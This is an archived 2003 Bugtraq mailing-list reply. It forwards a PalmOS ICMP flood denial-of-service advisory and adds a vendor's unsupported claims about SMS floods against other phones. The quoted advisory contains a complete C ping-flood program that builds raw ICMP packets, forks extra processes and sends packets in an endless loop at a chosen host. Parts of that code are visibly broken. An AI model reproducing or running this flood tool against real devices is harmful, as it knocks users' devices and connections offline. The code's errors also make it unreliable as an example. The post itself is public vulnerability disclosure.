Shaun, PalmOS isn't the only mobile device operating system that is vulnerable to flooding attacks like this. Caleb Sima of SPI Dynamics has discovered a highly effective SMS flood that will render most PocketPC and Symbian based devices, as well as almost every modern cellphone unusable. In addition, based on Caleb's work, MobileSecure Labs has determined that there are a number of similar attacks that will produce the same result. The bottom line: don't rely on these kinds of operating systems as being secure on their own -- they aren't. ______________ Jay D. Thomson MobileSecure, Inc. "Information security for a mobile world" http://www.mobile-secure.com/ -----Original Message----- Date: Wed, 14 May 2003 17:14:14 +0100 (BST) From: "[iso-8859-1] Shaun Moore" <shaunigeat_private> To: bugtraqat_private Subject: PalmOS ICMP flood DoS. -[BACKGROUND]-: PalmOS is vulnerable to an ICMP DoS attack, when an attacker continuously sends ICMP_ECHO packets to the device. This attack causes 100% CPU usage, and the device therefore comes to a total lockup. The Pilot is almost instantly rendered unusable, until the attacker stops sending packets, or the device is reset. The DoS attack often forces PalmOS to lose it's network connections (Internet and LAN connects etc...), due to the exhaustion of sending replies to the continuous hoard of ICMP_ECHO packets it is receiving. Although unconfirmed (haven't seen it happen yet), this attack may even cause the device to display the message "Fatal exception", and require resetting immediately. Although the vulnerability does not cause any data to be lost (unless the Palm is DoSed when a user is doing some work), this could still be extremely annoying to the Palm user trying to check his e-mail or writing a document. If the user is writing a document or doing some other form of work, and the attacker is persistant (won't stop until the device is offline), it would almost certainly mean loss of data since the user last save the document, because the user would probably end up resetting. -[EXPLOIT]-: To exploit the vulnerability, you would need to continuous send ICMP_ECHO packets, without waiting for a reply, by using one than more process for optional added effect (by using fork()'s). I wrote the following exploit program to exploit the vulnerability in PalmOS: ------------------CUT HERE------------------- #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <host>\n", argv[0]); exit(0); } int sock; char packet[2000]; struct sockaddr_in dest; struct hostent *host; struct iphdr *ip = (struct iphdr *) packet; struct icmphdr *icmp = (struct icmp *) packet + sizeof(struct iphdr); if((host = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve host!\n"); exit(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) { printf("Couldn't make socket!\n"); printf("You must be root to create a raw socket.\n"); exit(-1); } dest.sin_family = AF_INET; dest.sin_addr = *((struct in_addr *)host->h_addr); ip->ihl = 5; ip->id = htons(1337); ip->ttl = 255; ip->tos = 0; ip->protocol = IPPROTO_ICMP; ip->version = 4; ip->frag_off = 0; ip->saddr = htons("127.0"); ip->daddr = inet_ntoa(dest.sin_addr); ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr); ip->check = 0; icmp->checksum = 0; icmp->type = ICMP_ECHO; icmp->code = 0; printf("Ping flooding %s!\n", argv[1]); fork(); fork(); while(1) { sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr)); } return(0); } ------------------CUT HERE------------------- Thank you for your time. Shaun. __________________________________________________ Yahoo! Plus For a better Internet experience http://www.yahoo.co.uk/btoffer
This archive was generated by hypermail 2b30 : Mon May 19 2003 - 14:19:59 PDT